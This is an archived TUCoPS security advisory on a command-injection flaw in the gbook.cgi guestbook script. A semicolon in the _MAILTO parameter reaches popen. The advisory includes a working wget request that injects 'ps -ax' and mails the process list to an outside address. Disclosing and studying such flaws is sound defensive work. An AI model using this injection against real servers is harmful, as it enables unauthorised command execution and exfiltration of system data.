Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Guestbooks :: gbook.htm

Gbook.cgi - execute arbitrary code



Vulnerability

    gbook.cgi

Affected

    gbook.cgi

Description

    JW Oh found following.  gbook.cgi  is used by some web sites.   We
    can set  _MAILTO parameter,  and popen  is called  to execute mail
    command.   If ';'  is used  in _MAILTO  variable, you  can execute
    arbitrary command with it.  It's so trivial.

    This exploit  executes "ps  -ax" command  and sends  the result to
    haha@yaho.com.

        wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"

Solution

    It's fixed now...


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH